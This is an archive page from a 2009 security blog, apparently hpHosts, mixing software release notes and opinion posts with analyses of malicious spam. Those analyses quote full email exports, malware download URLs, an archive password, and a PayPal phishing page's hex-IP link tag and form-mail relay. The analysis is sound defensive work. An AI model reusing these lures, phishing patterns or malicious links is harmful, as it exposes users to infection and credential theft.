Blog for hpHosts, and whatever else I feel like writing about ....

Friday 30 January 2009

VIPRE PC Rescue

The VIPRE PC Rescue Program is a command-line utility that will scan and clean an infected computer that is so infected that programs cannot be easily run.

The VIPRE PC Rescue Program is packaged into a self-extracting executable file (.exe) that prompts the user for an "unpack" or installation location, then starts the scanner and performs a quick scan. The user can start the program either by opening it via windows or from the command line.

Virus definitions are included, and the program is self-running once executed. The initial scan, and all subsequent scans, include Rootkit Detection. Four command line options are available, enabling the program to perform a boot scan during the next start-up, perform a deep scan, log the events, and disabling the rootkit.

Detections are consistent with the full VIPRE, and the VIPRE PC Rescue Program is designed to disinfect a system so infected that a user cannot install VIPRE.

Note: Directions for creating a "VIPRE PC Rescue CD" will be available shortly.

http://live.sunbeltsoftware.com

Ref:
http://sunbeltblog.blogspot.com/2009/01/free-vipre-pc-rescue-program.html

Thursday 29 January 2009

Spambot Search Tool v0.16

30-01-2009 v0.16

+ Now also checks BotScout (botscout.com, API key not required but is recommended as they only allow limited queries without one)
+ Text files now also created when using check_spammers_plain.php (if enabled)

More info + Download
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

/edit

This has been re-released due to a couple of modifications that were required;

1. Domain doing the querying (i.e. the server hosting the SBST) must be provided when submitting to fspamlist.com
2. Error code was added to Bot Scout (see: http://botscout.com/forum/index.php/topic,2.0.html)

Web Platform Installer 1.0 released

Just received this in the MS Partner Newsletter and thought I'd share it;

Web Platform Installer 1.0 is a free tool that enables you to easily download and install the latest components of the Microsoft Web Platform, including Internet Information Services (IIS) 6.0 and 7.0, SQL Server 2008 Express, .NET Framework 3.5 SP1 and Visual Web Developer 2008 Express SP1. The Web Platform Installer offers a single installer to help you obtain the software you need to build and run a complete Web solution on the Microsoft Web platform, whether you are using Windows XP, Windows Server 2003, Windows Vista, or Windows Server 2008. With the Web Platform Installer, you can:

. Obtain components of the Microsoft Web Platform quickly and easily . Choose which components to install to set up a complete or custom Web platform . Install the latest versions of Microsoft Web Platform products, components and tools


http://www.microsoft.com/web/channel/products/WebPlatformInstaller.aspx

One on One with CEO of Web of Trust

If I named ten extensions I am the biggest fan of, WOT Web of Trust would be on that exclusive list.

Why? They provide a great service to the public, helping organize the public to alert itself about risky web site. The real power in WOT isn’t the tools, it is the users. It is the perfect mash up of the right tools, at the right time. Anything that is simple to use, and makes users more aware of the risks around them is a good thing. With that said, I wanted to talk a little more about the service with one of the people behind the magic, Esa Suurio, the CEO of Web of Trust.


Read the interview over at;

http://www.firefoxfacts.com/2009/01/20/one-on-one-with-ceo-of-web-of-trust/

Spambot Search Tool v0.15 Released

29-01-2009 v0.15

+ View spammers you've asked the filter to log to text file
+ View spammers you've had your mod email to you (assumes you've used the same email format as outlined on the TeMerc forums)
* Fixed spammers particulars not being logged to text file properly
- Ditched "Full" package in favour of the Simple (less to update and simple is what most want)

http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool

Tuesday 27 January 2009

Hotmail finally offering POP/IMAP access!

... and it's about bleeding time. Though this has been available via Outlook (courtesy of the Outlook Connector), this hasn't been viable for those either;

1. Without Outlook
2. Unwilling/unable to install the connector
3. Unaware of the connector
4. Wanting to access the accounts via script

Now that they are offering this for all accounts without requiring this, it now means everyone and their dog can access their accounts via whichever program they choose, or if they so wish, via their own custom scripts/programs.

Read more over at the FireTrust blog;

http://www.firetrust.com/en/blog/chris/hotmail-now-with-free-pop3-and-imap-access

For those wanting the quick low-down, the access details (courtesy of Chris at Firetrust) are;
  1. POP server: pop3.live.com
  2. POP server port: 995
  3. POP SSL required? Yes
  4. User name: Your Windows Live ID, for example yourname@hotmail.com
  5. Password: The password you usually use to sign in to Hotmail or Windows Live
  6. SMTP server: smtp.live.com
  7. SMTP server port: 25
  8. SMTP Authentication required? Yes (same as POP3 username and password)
  9. SMTP SSL required? Yes


They've not mentioned the IMAP details, but I am on a hunt to see if I've just missed them ....

Well smeg me silly, Red Dwarf's coming back!!

... but dear god I hope it's better than series 5-8 (they were good, but no-where near as good as 1-4).

It's taken them 21 years, but this Easter the crew of Red Dwarf will finally return to Earth in a two-part special which reunites many of the original cast.

The homecoming is courtesy of digital channel Dave, which on Friday 10 April will broadcast the first installment of Red Dwarf: Back to Earth - penned by the show's co-creator Doug Naylor and featuring Chris Barrie as Rimmer, Craig Charles as Lister, Danny John-Jules as Cat and Robert Llewellyn as Kryten.


http://www.theregister.co.uk/2009/01/27/red_dwarf/

Waledac identification implemented in hpHosts and vURL

Just a note folks, thanks to Sudosecure, both hpHosts Online and vURL Online will now tell you if the domain being queried, is known to be associated with the Waledac fast flux trojan.

Examples

vURL Online (yourregards.com)
http://vurl.mysteryfcm.co.uk/?url=184504

hpHosts Online (76.108.154.195)
http://hosts-file.net/?s=76.108.154.195

hpHosts Online (yourregards.com)
http://hosts-file.net/?s=yourregards.com

Saturday 24 January 2009

Update: r00t-y0u email switches to attachment

Whether or not this is the same miscreant as last time remains to be seen (though the file has the same properties), but it seems whichever it is, they've switched to a more direct route of infection (see left).

I am curious, with the amount of forum databases they've stolen from each other, why they're picking on r00t-y0u?

Exported by: Outlook Export v0.1.4

From: admin
E-mail:admin@swisskit.com [ 64.202.189.170 - pwfwd-v01.prod.mesa1.secureserver.net ]
Date: 24/01/2009 18:26:16
Subject: last versio update
**************************************************************************
Links
**************************************************************************

Link: hxxp://sm1.intellimaxx.net:80/track?type=click&mailingid=12131232&messageid=0000&databaseid=1234&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&
Domain: sm1.intellimaxx.net
IP: 209.171.53.170 [ sm1.intellimaxx.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://sm1.intellimaxx.net:80/track?mailingid=12131232&messageid=0000&databaseid=1234&type=open&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&
Domain: sm1.intellimaxx.net
IP: 209.171.53.170 [ sm1.intellimaxx.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
http://sm1.intellimaxx.net:80/track?type=click&mailingid=12131232&messageid=0000&databaseid=1234&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&& <IMG SRC="http://sm1.intellimaxx.net:80/track?mailingid=12131232&messageid=0000&databaseid=1234&type=open&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&" WIDTH="1" HEIGHT="1" BORDER="0" />

last vresion update.

password: qpwoeiruty



admin@swisskit.com.

**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2><A HREF="http://sm1.intellimaxx.net:80/track?type=click&mailingid=12131232&messageid=0000&databaseid=1234&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&">http://sm1.intellimaxx.net:80/track?type=click&mailingid=12131232&messageid=0000&databaseid=1234&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&</A>  <IMG SRC="<A HREF="http://sm1.intellimaxx.net:80/track?mailingid=12131232&messageid=0000&databaseid=1234&type=open&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&">http://sm1.intellimaxx.net:80/track?mailingid=12131232&messageid=0000&databaseid=1234&type=open&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&</A>" WIDTH="1" HEIGHT="1" BORDER="0" /><BR>
<BR>
last vresion update.<BR>
<BR>
password: qpwoeiruty<BR>
<BR>
<BR>
<BR>
admin@swisskit.com.</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: admin@swisskit.com
Delivered-To: [REMOVED]
X-FDA: 61836659262
X-SpamScore: 5
X-Spam-Summary: 10,1,0,493736707aa6fca6,21232f297a57a5a7,admin@swisskit.com,[REMOVED],
RULES_HIT:152:355:379:495:509:541:800:871:967:973:978:980:988:989:996:1000:1183:1260:1261:
1308:1309:1311:1313:1314:1345:1432:1515:1516:1518:1519:1529:1538:1569:1575:1594:1595:1676:
1696:1711:1714:1730:1747:1764:1766:1792:2198:2199:2393:2525:2561:2564:2682:2685:2857:2859:
2895:2933:2937:2939:2942:2945:2947:2951:2954:3022:3038:3151:3872:3876:3877:3934:3936:3938:
3941:3944:3947:3950:3953:3956:3959:4321:4648:5007:6114:6506:7281:7679:8501:9025:9391,0,RBL
:209.171.53.170-lbl7.mailshell.net-127.0.0.100,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:
none,DomainCache:0,MSF:not bulk,SPF:,MSBL:none,DNSBL:none
Received: from sm1.intellimaxx.net (sm1.intellimaxx.net [209.171.53.170])
by imf27.hostedemail.com (Postfix) with ESMTP
for <[REMOVED]>; Sat, 24 Jan 2009 19:42:04 +0000 (UTC)
Received: from sm1.intellimaxx.net ([10.4.0.170])
by sm1.intellimaxx.net (StrongMail Enterprise 4.1.1.1(4.1.1-44827)); Sat, 24 Jan 2009 13:26:17 -0500
X-VirtualServer: Default, sm1.intellimaxx.net, 0.0.0.0
X-VirtualServerGroup: Default
X-MailingID: 1222716135::12131232::1234::0000::43912::43912
X-SMHeaderMap: mid="X-MailingID"
X-Mailer: StrongMail Enterprise 4.1.1.1(4.1.1-44827)
X-Destination-ID: [REMOVED]
X-SMFBL: cjAwdC15MHVfb3JnQGl0LW1hdGUuY28udWs=
Content-Transfer-Encoding: 7bit
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_B0F2_327B23C6.643C9869"
MIME-Version: 1.0
Message-ID: <1222716135.43912@swisskit.com>
Subject: last versio update
Date: Sat, 24 Jan 2009 13:26:16 -0500
To: [REMOVED]
From: "admin" <admin@swisskit.com>




setup.exe
http://www.virustotal.com/analisis/30db38531435dfef018ce2b13afb6f9a

setup.rar
http://www.virustotal.com/reanalisis.html?b4e8ed0d8f237f57bc7bb5b8a657d281

... and yep, detection is still rubbish.

/edit

Forgot to add the files new MD5: AFF965C7FEBD4CF6B110F0C824D471A9

Friday 23 January 2009

WorldNic (Network Solutions) resolution issue

See the following for details;

http://system.opendns.com/2009/01/23/81/

Stolen r00t-y0u DB leads to malware

What happens when you cross a stolen hacker database with open distribution? Why this of course (graphic version to the left);

Exported by: Outlook Export v0.1.4


From: Enric
E-mail:Enric@gmail.com [ 64.233.161.83 - od-in-f83.google.com ]
Date: 23/01/2009 18:57:07
Subject: realy nice video check it.
**************************************************************************
Links
**************************************************************************

Link: http://sm1.intellimaxx.net:80/track?mailingid=112233&messageid=121&databaseid=1234&type=open&serial=1222716134&emailid=[REMOVED]&userid=43912&extra=&&&
Domain: sm1.intellimaxx.net
IP: 209.171.53.170 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://video-share.servegame.org/Best.html
Domain: video-share.servegame.org
IP: 63.208.196.110 [ hop.mywebhop.org ]
hpHosts Status: Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
<http://sm1.intellimaxx.net:80/track?mailingid=112233&messageid=121&databaseid=1234&type=open&serial=1222716134&emailid=[REMOVED]&userid=43912&extra=&&&> nice video http://video-share.servegame.org/Best.html enjoy!!!


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2> <<A HREF="http://sm1.intellimaxx.net:80/track?mailingid=112233&messageid=121&databaseid=1234&type=open&serial=1222716134&emailid=[REMOVED]&userid=43912&extra=&&&">http://sm1.intellimaxx.net:80/track?mailingid=112233&messageid=121&databaseid=1234&type=open&serial=1222716134&emailid=[REMOVED]&userid=43912&extra=&&&</A>> nice video <A HREF="http://video-share.servegame.org/Best.html">http://video-share.servegame.org/Best.html</A> enjoy!!!<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: enric@gmail.com
Delivered-To: [REMOVED]
X-FDA: 61833107406
X-Panda: scanned!
X-SpamScore: 5
X-Spam-Summary: 73,5,0,8e5bddad4f42bc39,8efcb81be1d9d39e,enric@gmail.com,[REMOVED],RULES_HIT:46:150:152:355:375:379:495:509:541:857:946:967:972:973:980:988:989:996:1183:1224:1260:
1261:1311:1312:1313:1314:1345:1432:1515:1516:1517:1519:1527:1534:1537:1569:1593:1594:
1595:1596:1676:1696:1699:1711:1714:1730:1747:1766:1792:2194:2198:2199:2200:2393:2525:
2561:2564:2682:2685:2857:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3770:3872:
3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4648:5007:6114:6117:
7679:8501:8599:8985:9025:9040:9108:9388:9391:9413,0,RBL:209.171.53.172-lbl7
.mailshell.net-127.0.0.100,CacheIP:none,Bayesian:0.5,0.5,0.5
,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fu,MSBL:none,DNSBL:none
Received: from sm1.intellimaxx.net (unknown [209.171.53.172])
by imf19.hostedemail.com (Postfix) with ESMTP
for <[REMOVED]>; Fri, 23 Jan 2009 20:12:41 +0000 (UTC)
Received: from sm1.intellimaxx.net ([10.4.0.170])
by sm1.intellimaxx.net (StrongMail Enterprise 4.1.0(4.1.0-41174)); Fri, 23 Jan 2009 13:54:16 -0500
X-VirtualServerGroup: Default
X-MailingID: 1222716134::112233::1234::121::43912::43912
X-SMHeaderMap: mid="X-MailingID"
X-Mailer: StrongMail Enterprise 4.1.0(4.1.0-41174)
X-Destination-ID: [REMOVED]
X-SMFBL: cjAwdC15MHVfb3JnQGl0LW1hdGUuY28udWs=
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Content-Type: text/html;
charset="UTF-8"
Reply-To: Enric@gmail.com
MIME-Version: 1.0
Message-ID: <1222716134.43912@gmail.com>
Subject: =?UTF-8?B?IHJlYWx5IG5pY2UgdmlkZW8gY2hlY2sgaXQu?=
Date: Fri, 23 Jan 2009 13:57:07 -0500
To: [REMOVED]
From: "Enric" <Enric@gmail.com>


The malicious link in this case is the one leading to;

video-share.servegame.org/Best.html (IP: 63.208.196.110 [ hop.mywebhop.org ])

... as this leads directly to codec infections at;

danicamarkovic.ca/php/codecs/codec_pack_3.2.1.exe (IP: 38.113.185.126)
track-turbo.com/download/TestCodec.v.3.127.cab (IP: 203.169.164.18 [ vp164018.hk.uac65.hknet.com ])

The latter of these two, track-turbo.com, returns a 404. Detection for codec_pack_3.2.1.exe is absolutely rubbish as usual.

http://www.virustotal.com/analisis/85cbee23493d14f184cf6f5777d98c52

File properties;

Company: BCN
Version: 1.0.0.0
Size: 164K
MD5: 6B6159546D2AC50487D953D3B500366F

Basing it on the strings, attempts to run it in VMWare, Sandboxie, Anubis, ThreatExpert et al, would fail (not that it'll stop me trying);



Needless to say, this is being targetted specifically to r00t-y0u members (not that surprising - the various forums are often trying to hack each other and/or out-do each other in varying ways). However, this domain is likely going to be used in other less targetted campaigns, so block it ASAP.

Tuesday 20 January 2009

WinPatrol 16 Beta: Scotty gots a new leash!

Scotty now has a new leash in the form of v16 beta, released yesterday. New features include;

- Specifically designed to work with Windows 7
- UAC alert only when actually required
- Selectively hide alerts
- Selectively hide RunOnce change alerts

Read the full write up, and download the beta over at;

http://www.winpatrol.com/beta16.html

hpHOSTS - UPDATED January 20th, 2009

hpHOSTS - UPDATED January 20th, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 54,479 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 20/01/2009 15:20
  2. Last Verified: 20/01/2009 15:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Sunday 18 January 2009

EU gone bonkers .... again (suing Microsoft - again)

Bradley pretty much says exactly what my thoughts are on this;

Dear EU commission:

Do you take Paypal? Seriously. I see that you are suing Microsoft again. http://www.ft.com/cms/s/0/647e7e40-e599-11dd-afe4-0000779fd2ac.html?nclick_check=1 Must mean you need more money. So how about I send you some so that more software building decisions are done because it's solid engineering decisions and not some stupid counter move against an EU lawsuit. Every time I look at a confusing Microsoft SKU list, the EU versions of the software don't help me understanding what product I need to buy.

I'm sorry to be in a snarky mood tonight but I'm tired of shortcuts, buttons and toolbars that I kinda like being impacted by your threats. Remember when one of the hotfixes and later a service pack took off the shortcut in XP to show IE on the desktop? Yeah, my impression we have you guys to thank for that one. It was a competition move. Already I'm annoyed that Windows 7 doesn't natively have IE at the top of the Start menu. Do we get to thank you for that default?


Read the full story:
http://msmvps.com/blogs/bradley/archive/2009/01/18/dear-eu-do-you-take-paypal.aspx

Note: ft.com require registration to read their articles .... (says I've read 3 in the last 30 days, which is strange considering it's the first time I've been to their site)

Saturday 17 January 2009

Adobe Flex In Visual Studio

Latest news from my friend Huw at Bitwise Magazine;

"Just a quick note to let you know that my company, SapphireSteel Software, has just released beta 2 of our new Adobe Flex IDE for Visual Studio.
This version adds IntelliSense including class, member, event and object completion for both the ActionScript programming language and MXML formatting code."


Read more and download....
http://www.bitwisemag.com/2/Adobe-Flex-In-Visual-Studio-latest

Friday 16 January 2009

sGB guestbook service now back online!

I am pleased to announce, the sGB service is now back online.

I've taken this chance to implement a few changes to the service to try and improve it. The first is e-mail confirmation - this is now required for new accounts.

The second is not something you should notice and simply involves some back end changes to try and make it a little easier as far as updating/modifying (basically to cut down on my having to make changes to hundreds of files).

Unfortunately however, all of the old guestbooks were lost. This means you'll need to re-register your account.

sGB - Free hosted guestbooks, complete with administration, spam protection and customization - and still advert free!
http://guestbook.it-mate.co.uk

Thursday 15 January 2009

Directi still allowing criminals and scammers!

Yep, not surprisingly, they evidently haven't stayed all lovely and caring for long (likely just long enough for the last hailstorm of hate to die down).

See the information on the Spyware Sucks blog for details - then feel free to shout at Directi ;o)

Glowing brain malvertizement – and, once again, we find DIRECTI
http://msmvps.com/blogs/spywaresucks/archive/2009/01/15/1661878.aspx

Directi Internet Solutions strikes again
http://msmvps.com/blogs/spywaresucks/archive/2009/01/13/1661206.aspx

... and whilst you're there, check out this one too - glad it's not just me that finds adverts in RSS feeds completely irritating (though admittedly, I also hate adverts in e-mails and newsletters too - but thats just me);

Advertising in RSS feeds
http://msmvps.com/blogs/spywaresucks/archive/2009/01/14/1661550.aspx

hpObserver 0.4.2 released

I am pleased to announce, hpObserver 0.4.2 has been released. Changes in this release include;

Added: Select fields to export when saving results (Tools > Settings > Export)
Added: Check site with Browser Defender (requested)
Added: Check site with Norton Safe Web (requested)
Added: Check site with Exploit Prevention Labs Links Scanner

Modified: "Check this site ..." options moved to "Check this site" sub menu in order to shorten context menu (requested)
Modified: Updated vURL query menu (pointed to old vURL Online website)
Modified: Updated Web Sniffer query menu

I would also like to extend a huge thank you to Hardhead for letting me know the program worked wonderfully on the new Windows 7 Beta

Download:
http://support.it-mate.co.uk/?mode=Products&act=DL&p=hpobserver

Wednesday 14 January 2009

Outlook Export 0.1.4 released

A new update to Outlook Export is now available. The updates include;

Version: 0.1.4

Modified: New attachments icon for e-mails (in list, not toolbar)
Modified: Re-written export routines to prevent clashes with same filenames overwriting each other

Misc: Other minor modifications

Version: 0.1.3 (Date/Time: 22/12/2008 21:37:50)

Added: Export Outlook mail accounts (Tools > Outlook Mail Accounts)
Added: View Outlook mail accounts (Tools > Outlook Mail Accounts)

Modified: Updated End User Licence Agreement
Modified: Support links changed due to hpHosts forums being offline

Misc: Other minor modifications

Version History
http://support.it-mate.co.uk/?mode=Products&act=History&p=outlookexport

Download:
http://support.it-mate.co.uk/?mode=Products&act=DL&p=outlookexport

Ikea: Miscreant for acceptable

I've been archiving malicious e-mails for years now, and have seen everything from greetings cards, to Airline tickets, to UPS parcels to lord knows what else, but was rather surprised today when I received several e-mails claiming to be from Ikea;

Welcome to IKEA.com affordable solutions for better living

IKEA has a Fantastic new FREE tool for home decorating.

Introducing our Home Planner software which allows you to plan your home in a 3D environment.

Simply follow the instructions in the attachment and start planning your dream home today.

Inter IKEA Systems B.V. 1999 - 2009
About the IKEA Concept and IKEA franchising


The attachment of course, is a lovely little zip file, ikea.zip (MD5: DD9EF0E43889DE84F076789D802A8F57), and inside, a 342K SCR file (MD5: 3EE4F3EFAB94BFCE790A5FB93D1465C6), trying to masquerade as a .doc (MS Word) file



Detection isn't great, but is better than usual, with 16/39 detecting it;

http://www.virustotal.com/analisis/60db801714d94bf4cf47a1d0e1f2b849

/edit 15-01-2009 00:02

ThreatExpert got back to me with the sandbox report;

http://www.threatexpert.com/report.aspx?md5=3ee4f3efab94bfce790a5fb93d1465c6

Tuesday 13 January 2009

secure.paypal-cgi-bin-us.xn.pl > 166.104.226.75 (infosec.hanyang.ac.kr) > abiedanter.co.uk

PayPal phishing scams are nothing new, but this one is rather interesting as it uses 3 different hosts for a single phish. One for the e-mail, the second loaded both via an iFrame AND via the LINK tag normally used for the shortcut icon;

<link rel="Shortcut icon" href="http://0xa668e24b/~hkoh/secure.paypal.com/webscr.htm?/favicon.ico" />




0xa68e24 is a hex encoded IP and decodes to 166.104.226.75, which resolves to infosec.hanyang.ac.kr. When you click the link in the e-mail, it redirects to;



Finally it uses a Form Mail script at abiedanter.co.uk (195.171.90.14 - orion.wyehosts.net) to send the victims details to the phisher (in this case spmdnss@gmail.com);



So what of the e-mail itself? Well since I don't use HTML e-mail (and neither should you!), I can only show it in plain text form. The following is an export of the entire e-mail, including headers.

Exported by: Outlook Export v0.1.3

From: PayPal
E-mail:service@paypal.inc.com [ - Invalid IP was passed to me ]
Date: 13/01/2009 18:10:43
Subject: New email address added to your PayPal account
**************************************************************************
Links
**************************************************************************

Link: https://www.paypal.com/us/wf/f=ap_email
Domain: www.paypal.com
IP: 64.4.241.33 [ www.paypal.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://secure.paypal-cgi-bin-us.xn.pl/?wf/f=ap_email
Domain: secure.paypal-cgi-bin-us.xn.pl
IP: 87.98.236.114 [ granat.cal.pl ]
hpHosts Status: Listed
MDL Status: Not Listed
PhishTank Status: true

**************************************************************************
Text Version
**************************************************************************
You have added jamessoul899@yahoo.com as a new email address for your PayPal account.

If you did not authorize this change or if you need assistance with your account, please contact PayPal customer service at:

https://www.paypal.com/us/wf/f=ap_email <http://secure.paypal-cgi-bin-us.xn.pl/?wf/f=ap_email>

Thank you for using PayPal!
The PayPal Team

-----------------------------

**************************************************************************
Headers
**************************************************************************
Return-Path: service@paypal.inc.com
Delivered-To: hphosts@[REMOVED]
X-FDA: 61796512134
X-Panda: scanned!
X-SpamScore: 5
X-Spam-Summary: 80,6,0,4778cd017079e040,ad69e733ebae8d26,service@paypal.inc.com,customer@paypal.com,RULES_HIT:
69:375:379:539:540:541:542:543:567:800:967:973:980:983:988:989:1026:1155:1208:1224:12
54:1260:1311:1313:1314:1431:1437:1515:1516:1517:1534:1541:1561:1587:1590:1593:1594:16
31:1653:1699:1711:1714:1730:1747:1766:1792:2073:2076:2194:2198:2199:2200:2393:2525:25
60:2564:2610:2682:2685:2857:2859:2890:2900:2910:2933:2937:2939:2942:2945:2947:2951:29
54:3022:3043:3137:3139:3155:3280:3865:3869:3873:3876:3877:3934:3936:3938:3941:3944:39
47:3950:3953:3956:3959:4042:4321:5007:6114:6261:7679:8501:8568:8957:9025:9040:9388,0
,RBL:62.140.23.58-lbl7.mailshell.net-127.0.0.100,CacheIP:none,Bayesian:0.5,0.5,0.5
,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:,MSBL:none,DNSBL:none
Received: from s558.evanzo-server.de (s558.evanzo-server.de [62.140.23.58])
by imf04.hostedemail.com (Postfix) with ESMTP
for <hphosts@[REMOVED]>; Tue, 13 Jan 2009 18:10:46 +0000 (UTC)
Received: (qmail 19954 invoked from network); 13 Jan 2009 19:18:59 +0100
Received: from unknown (HELO User) (218.154.52.101)
by s558.evanzo-server.de with SMTP; 13 Jan 2009 19:18:59 +0100
From: "PayPal"<service@paypal.inc.com>
To: customer@paypal.com
Subject: New email address added to your PayPal account
Date: Wed, 14 Jan 2009 03:10:43 +0900
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000


abiedanter.co.uk is a legit website. The only thing they're guilty of here is being silly enough not to lock down their form mail scripts to prevent third party use. The owner information for the other two involved are;

WhoIs Information:

DOMAIN: xn.pl
registrant's handle: ont_o85624 (INDIVIDUAL)
nameservers: ns2.cal.pl. [87.98.162.72]
ns1.cal.pl. [87.98.237.11]
created: 2004.03.22 08:33:47
last modified: 2008.12.14 20:43:45

option created 2008.02.01 00:03:06

TECHNICAL CONTACT:
company: Lukasz Przekop
street: Solidarnosci 60/4
city: 00-240 Warszawa
location: PL
handle: ont_t85614
last modified: 2008.03.12

REGISTRAR: Grupa Onet.pl SA
ul. G. Zapolskiej 44
30 - 126 Krakow
Polska/Poland
+48. 12 2600200
bok@onet.pl


Domain Name : hanyang.ac.kr
Registrant : Hanyang University
Registrant Address : 17, haengdang-dong, Songdong-gu, Seoul, Korea Hanyang University, Haengdang-dong, Seongdong-gu Seoul, KR
Registrant Zip Code : 133070
Administrative Contact(AC): JeKwang Mun
AC E-Mail : moonriver@hanyang.ac.kr
AC Phone Number : 02-2220-1427
Registered Date : 1994. 03. 07.
Last updated Date : 2008. 12. 04.
Expiration Date : 2009. 05. 01.
Publishes : Y
Authorized Agency : Inames Co., Ltd.(http://www.inames.co.kr)

Primary Name Server
Host Name : hynetm.hanyang.ac.kr
IP Address : 166.104.27.6

Secondary Name Server
Host Name : ansan-d.hanyang.ac.kr
IP Address : 166.104.239.11
Host Name : kns.kornet.net
Host Name : ns.lgdacom.net


As always, don't blindly click on links in e-mails. The only reason these phishing scams are successful is because people don't actually look at where the link is going to take them, nor do they look at the URL in the address bar!. You need to start taking notice and actually type the websites address into the browsers address bar (irrespective of where the link is going to take you, or claims it is going to take you).

Sunday 11 January 2009

Spambot Search Tool v0.13

Just a note folks, Spambot Search Tool v0.13 has now been released. The only change in this release, is a modification to the functions so those without file_get_contents() can still use it via cURL (assuming cURL is installed and enabled).

http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool

Thursday 8 January 2009

firnop.cn update

Well well, looks like it is a once per 24 hour deal as I apparently accessed it at 20:25 yesterday, and an attempt to access it again whilst testing modifications to vURL Desktop Edition, showed I was again allowed access. The code is the same as yesterday pretty much, with the only obvious change (besides the variable names) being the text fields ID, this time being mudora.



vURL Online (cached 08-01-2009 23:01):
http://hosts-file.net/misc/firnop_cn/vURL_Online_-_firnop_cn-080109.html

Once again we're given a 404 on subsequent attempts, as shown by;

http://vurl.mysteryfcm.co.uk/?url=155207

IP and PTR hasn't changed, neither has the code itself (or the results of the code when decoded). The only change infact, seems to be the text fields ID value and the variable names.

New powers for police to hack your PC

I first noticed this story on the Eset blog and though absolutely disgusted (if true, I've not seen anything that verifies what The Independent is telling us yet), am finding myself laughing hysterically at the same time.

The story reads in part:

Police have been given the power to hack into personal computers without a court warrant. The Home Office is facing anger and the threat of a legal challenge after granting permission. Ministers are also drawing up plans to allow police across the EU to collect information from computers in Britain.

The moves will fuel claims that the Government is presiding over a steady extension of the "surveillance society" threatening personal privacy.

Hacking – known as "remote searching" – has been quietly adopted by police across Britain following the development of technology to access computers' contents at a distance. Police say it is vital for tracking cyber-criminals and paedophiles and is used sparingly but civil liberties groups fear it is about to be vastly expanded.


Okay, a few problems here, firstly "Hacking" is not known as "remote searching", it is known as gaining unauthorised entry to a system via exploit or vulnerability (a real hacker doesn't need a trojan pre-planted on the system to access your PC). If that were the case, any VNC/remote desktop software could be classed as "hacking" - something it quite clearly is not, searching Google could be classed as "remote searching" since you are searching a remote system - something it most definately is not (little to the extreme there I know, but their article is vague at best). For a more accurate description of hacking and hackers, see the following;

http://www.schneier.com/blog/archives/2006/09/what_is_a_hacke.html
http://www.ed.uiuc.edu/wp/crime/hacking.htm

Computer hacking has to be approved by a chief constable, who must be satisfied the action is proportionate to the crime being investigated.


Here lies one of the biggest problems. If the crime being investigated warrants hacking into someones computer, then why does it not warrant getting an err - warrant to LEGALLY search their computer? I am 100% sure that this is going to be abused by the police to plant "evidence" for those they can't get any other way. Thats how they do it now, why change? Especially when they are performance based.

A spokesman for the Association of Chief Police Officers, said police carried out 194 hacking operations in 2007-08 in England, Wales and Northern Ireland, including 133 in private homes, 37 in offices and 24 in hotel rooms.

The spokesman said such surveillance was regulated under the Regulation of Investigatory Powers Act.

"The police service in the United Kingdom will aggressively pursue serious and organised criminality, including where that takes the modern forms of hi-tech crime," he added.


Correct me if I am wrong but, wasn't RIPA meant for preventing terrorism? How exactly does that translate into allowing them to hack into all and sundry's computers whenever they feel like it?

The first Britons will receive biometric identity cards at the end of the year, paving the way to the world's largest identity register. Genetic details of more than four million people are on the DNA national database, the highest proportion of any Western country.


You'll not be getting me to allow you to get my damn DNA or any form of "biometric identity card". They can't even keep their own employee's data safe, how can they keep this safe?

Regardless of the above, if this is true, then we've got serious problems (not that we didn't already) in that the Police now have far too much power - power they most definately should not have. Unfortunately however, without verification one way or the other, thats all this is - pure speculation. All I do know, is I already do not trust the UK police force, and this is just one more reason not to trust them - they have been proven to be corrupt before, many times.

Read the full article at:

New powers for police to hack your PC
http://www.independent.co.uk/news/uk/home-news/new-powers-for-police-to-hack-your-pc-1225802.html

